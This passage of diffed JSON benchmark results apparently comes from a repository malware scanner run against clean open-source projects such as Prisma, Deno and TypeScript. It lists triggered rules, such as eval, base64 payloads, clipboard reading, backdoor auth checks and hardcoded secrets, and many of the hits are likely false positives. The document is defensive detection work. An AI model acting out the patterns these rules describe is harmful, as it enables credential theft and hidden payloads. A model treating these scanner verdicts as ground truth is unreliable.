"line": 11, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BACKDOOR_HARDCODED_AUTH", + "file": "examples/passport-example/cjs/index.js", + "line": 58, + "description": "Hardcoded password check — always-true backdoor condition in auth logic" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BACKDOOR_HARDCODED_AUTH", + "file": "examples/passport-example/esm/index.js", + "line": 61, + "description": "Hardcoded password check — always-true backdoor condition in auth logic" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "examples/basic-crud-application/server-postgres-cluster/lib/index.js", + "line": 17, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 655, + "treeTruncated": false, + "durationMs": 3871, + "error": "" + }, + { + "sampleId": "reference-apollographql-apollo-client", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/apollographql/apollo-client", + "immutableRef": "c843c98a803d7d7f48f4da72080a61d9086dc8ad", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 853, + "treeTruncated": false, + "durationMs": 4975, + "error": "" + }, + { + "sampleId": "reference-tanstack-query", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/TanStack/query", + "immutableRef": "79d2384db5c8776680d5bfbe9b595618c066248b", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "HARDCODED_API_KEY" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_API_KEY", + "file": "examples/react/algolia/src/algolia.ts", + "line": 7, + "description": "Generic API key / secret key pattern assigned to a variable (obvious placeholders are downgraded by scanner context)" + } + ], + "filesScanned": 200, + "filesSkipped": 2151, + "treeTruncated": false, + "durationMs": 3813, + "error": "" + }, + { + "sampleId": "reference-testing-library-react-testing-library", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/testing-library/react-testing-library", + "immutableRef": "be9d81d91314c9f0bafaa363f70b409b4b31989c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 36, + "filesSkipped": 31, + "treeTruncated": false, + "durationMs": 2372, + "error": "" + }, + { + "sampleId": "reference-prisma-prisma", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/prisma/prisma", + "immutableRef": "cda80a4488b7b551c36bf09ca2e8303ef9509da4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.65, + "safeToClone": false, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE", + "OBF_EVAL", + "HARDCODED_DB_CONNECTION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"prettier\": prettier2" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/cli/src/Generate.ts", + "line": 36, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_DB_CONNECTION", + "file": "packages/cli/src/Init.ts", + "line": 193, + "description": "MongoDB or PostgreSQL connection string with credentials embedded" + } + ], + "filesScanned": 200, + "filesSkipped": 4471, + "treeTruncated": false, + "durationMs": 4279, + "error": "" + }, + { + "sampleId": "reference-tailwindlabs-tailwindcss", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/tailwindlabs/tailwindcss", + "immutableRef": "35a3e9c5159bea77af0d48f0c8849279211cc7e9", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 341, + "treeTruncated": false, + "durationMs": 3251, + "error": "" + }, + { + "sampleId": "reference-prettier-prettier", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/prettier/prettier", + "immutableRef": "41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.75, + "safeToClone": false, + "rulesTriggered": [ + "OBF_NEW_FUNCTION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "bin/prettier.cjs", + "line": 16, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "knip.config.js", + "line": 17, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "scripts/build/transform/transforms/transform-string-raw.js", + "line": 31, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + } + ], + "filesScanned": 200, + "filesSkipped": 9125, + "treeTruncated": false, + "durationMs": 3199, + "error": "" + }, + { + "sampleId": "reference-eslint-eslint", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/eslint/eslint", + "immutableRef": "c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/src/assets/js/search.js", + "line": 186, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 2156, + "treeTruncated": false, + "durationMs": 3847, + "error": "" + }, + { + "sampleId": "reference-pnpm-pnpm", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/pnpm/pnpm", + "immutableRef": "0dd21df7457d2026f411f2c1a09104280b9b16e5", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "pnpm11/auth/commands/src/login.ts", + "line": null, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 4869, + "treeTruncated": false, + "durationMs": 4116, + "error": "" + }, + { + "sampleId": "noisy-denoland-deno", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/denoland/deno", + "immutableRef": "e5aed78415ded1213794bbf1ebbde1bf5cfa08b4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBFUSCATED_CODE", + "OBF_BASE64_HEAVY", + "OBF_EVAL", + "HARDCODED_SECRETS", + "NETWORK_COMMUNICATION", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "cli/tools/doc/prism.js", + "line": 3, + "description": "Extremely long line detected (7,461 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 3 (7,461 chars, contains suspicious code), Line 8 (6,143 chars), Line 10 (5,138 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "cli/tsc/dts/lib.es2020.intl.d.ts", + "line": 80, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "cli/tsc/dts/lib.es5.d.ts", + "line": 31, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "cli/tsc/dts/lib.webworker.d.ts", + "line": 1986, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": ".github/workflows/ci.ts", + "line": 758, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": ".github/workflows/promote_to_release.ts", + "line": 157, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "cli/tsc/dts/lib.deno.ns.d.ts", + "line": 5375, + "description": "Suspicious network communication detected: Hardcoded IP Address (3 occurrences)" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "cli/tsc/dts/lib.deno_net.d.ts", + "line": 257, + "description": "Suspicious network communication detected: Hardcoded IP Address (5 occurrences)" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": "cli/tools/doc/prism.js", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 14300, + "treeTruncated": false, + "durationMs": 11033, + "error": "" + }, + { + "sampleId": "noisy-oven-sh-bun", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/oven-sh/bun", + "immutableRef": "8f1a9540fdff25410506de76e0da2506d260c08f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBFUSCATED_CODE", + "OBF_EVAL", + "HARDCODED_SECRETS", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "bench/react-hello-world/react-hello-world.workerd.js", + "line": 16, + "description": "Extremely long line detected (36,141 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 16 (30,001 chars, contains suspicious code), Line 18 (6,437 chars), Line 23 (9,431 chars)" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "bench/snippets/buffer-create.mjs", + "line": 17, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "bench/snippets/pbkdf2.mjs", + "line": 5, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": "bench/react-hello-world/react-hello-world.workerd.js", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 17929, + "treeTruncated": false, + "durationMs": 3913, + "error": "" + }, + { + "sampleId": "noisy-tauri-apps-tauri", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/tauri-apps/tauri", + "immutableRef": "f5347cd70838c027040acb4a66733a2470f20ae4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.83, + "safeToClone": false, + "rulesTriggered": [ + "OBFUSCATED_CODE", + "SUSPICIOUS_FILE_ACCESS", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "crates/tauri/scripts/bundle.global.js", + "line": 1, + "description": "Extremely long line detected (40,694 characters). Malicious code may be hidden far to the right. Affected: Line 1 (40,694 chars)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".docker/cross/cmake.sh", + "line": 27, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".docker/cross/linux-image.sh", + "line": 173, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "packages/api/src/core.ts", + "line": 241, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 133, + "filesSkipped": 948, + "treeTruncated": false, + "durationMs": 2948, + "error": "" + }, + { + "sampleId": "noisy-puppeteer-puppeteer", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/puppeteer/puppeteer", + "immutableRef": "5f5f931a0f2bc64bfb30039c507d763ce044c263", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_EVAL", + "EXFIL_CLIPBOARD", + "OBF_SETTIMEOUT_STRING" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/puppeteer-core/src/api/ElementHandle.ts", + "line": 463, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/puppeteer-core/src/api/Frame.ts", + "line": 624, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_CLIPBOARD", + "file": "packages/puppeteer-core/src/api/Input.ts", + "line": 333, + "description": "Reads clipboard content — can steal copied passwords, 2FA codes, crypto addresses" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/puppeteer-core/src/api/Page.ts", + "line": 1353, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_SETTIMEOUT_STRING", + "file": "packages/puppeteer-core/src/api/locators/locators.ts", + "line": null, + "description": "Passing a string to setTimeout/setInterval executes it as code (like eval). A common obfuscation technique: setTimeout(\"maliciousCode()\", 0)\n" + } + ], + "filesScanned": 200, + "filesSkipped": 2016, + "treeTruncated": false, + "durationMs": 3480, + "error": "" + }, + { + "sampleId": "noisy-microsoft-typescript", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/microsoft/TypeScript", + "immutableRef": "637d5746b70257028fb95aad32ddec6b26ab0a14", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBFUSCATED_CODE", + "OBF_EVAL", + "OBF_NEW_FUNCTION", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/commandLineParser.ts", + "line": 1941, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/moduleNameResolver.ts", + "line": 79, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/parser.ts", + "line": 1042, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/program.ts", + "line": 227, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/resolutionCache.ts", + "line": 67, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "src/compiler/scanner.ts", + "line": 333, + "description": "Extremely long line detected (10,367 characters). Malicious code may be hidden far to the right. Affected: Line 333 (5,355 chars), Line 342 (8,908 chars), Line 344 (10,367 chars)" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/transformers/classFields.ts", + "line": 1846, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/transformers/destructuring.ts", + "line": 142, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/transformers/es2015.ts", + "line": 571, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/types.ts", + "line": 4730, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/utilities.ts", + "line": 509, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/watchPublic.ts", + "line": 75, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/harness/fourslashImpl.ts", + "line": 785, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "src/harness/fourslashImpl.ts", + "line": 791, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/harness/fourslashInterfaceImpl.ts", + "line": 331, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "src/compiler/transformers/es2015.ts", + "line": 3702, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "src/compiler/utilities.ts", + "line": 6201, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + } + ], + "filesScanned": 200, + "filesSkipped": 53109, + "treeTruncated": true, + "durationMs": 10187, + "error": "" + }, + { + "sampleId": "noisy-npm-cli", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/npm/cli", + "immutableRef": "7b1f6c173d17b3bf30e45426f6df39473c6a1163", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/commands/profile.js", + "line": null, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/utils/auth.js", + "line": null, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/utils/read-user-info.js", + "line": null, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 6701, + "treeTruncated": false, + "durationMs": 3461, + "error": "" + }, + { + "sampleId": "noisy-homebrew-brew", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/Homebrew/brew", + "immutableRef": "76ca8d74e4a180badad438bf245ddfc740d68a8e", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "medium", + "actualScore": 0.59, + "safeToClone": false, + "rulesTriggered": [ + "HIDDEN_FILE", + "SOCIAL_ENGINEERING_SECURITY_BYPASS", + "SUSPICIOUS_FILE_ACCESS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "HIDDEN_FILE", + "rule": "HIDDEN_FILE", + "file": ".shellcheckrc", + "line": null, + "description": "Suspicious hidden file: .shellcheckrc" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "SOCIAL_ENGINEERING_SECURITY_BYPASS", + "file": "Library/Homebrew/cask/installer.rb", + "line": 176, + "description": "README instructs users to disable antivirus, firewall, or security tools" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "Library/Homebrew/brew.sh", + "line": 860, + "description": "Suspicious file access detected: Destructive File Deletion" + } + ], + "filesScanned": 200, + "filesSkipped": 2970, + "treeTruncated": false, + "durationMs": 3130, + "error": "" + }, + { + "sampleId": "noisy-python-cpython", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/python/cpython", + "immutableRef": "1fece4457032382947c7c2a5c9e95dc106ca7a7d", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBF_NEW_FUNCTION", + "OBFUSCATED_CODE", + "OBF_HEX_STRINGS", + "DATA_EXFILTRATION", + "NETWORK_COMMUNICATION", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 9, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 9, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + 